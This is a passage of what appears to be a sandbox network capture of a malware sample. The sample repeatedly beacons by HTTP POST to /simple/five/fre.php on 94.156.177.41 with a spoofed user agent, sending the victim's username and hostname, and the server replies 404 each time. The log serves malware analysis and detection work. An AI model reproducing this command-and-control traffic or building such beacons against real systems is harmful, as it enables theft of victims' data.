Jan 11, 2025 07:45:49.823978901 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50072	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:49.995032072 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:49.999888897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:50.734549999 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50073	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:50.892791986 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:50.897746086 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:51.619489908 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50074	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:51.762840986 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:51.767771959 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:52.455550909 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50075	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:52.605214119 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:52.610435009 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:53.300391912 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50076	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:53.842950106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:53.849528074 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:54.575973988 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50077	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:54.728818893 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:54.733798981 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:55.483252048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50078	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:55.633569956 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:55.638595104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:56.355166912 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50079	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:56.509545088 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:56.514452934 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:57.212044001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50080	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:57.359915018 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:57.364759922 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:58.216295958 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50081	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:58.377670050 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:58.382541895 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:59.120776892 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50082	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:59.294701099 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:59.299658060 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:59.986650944 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50083	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:00.140888929 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:00.145771027 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:00.838119984 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50084	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:00.976548910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:00.982125998 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:01.716804028 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50085	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:01.867796898 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:01.873444080 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:02.578923941 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50086	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:02.868691921 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:02.873702049 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:03.569354057 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50087	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:03.717689037 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:03.722759962 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:04.428982973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50088	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:04.598776102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:04.607701063 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:05.309093952 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50089	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:05.485071898 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:05.489995956 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:06.195997953 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50090	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:06.348757982 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:06.353602886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:07.103013039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50091	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:07.250516891 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:07.255436897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:07.967211008 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50092	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:08.133380890 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:46:08.138322115 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:46:08.856152058 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:46:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50093	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:46:09.026247025 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
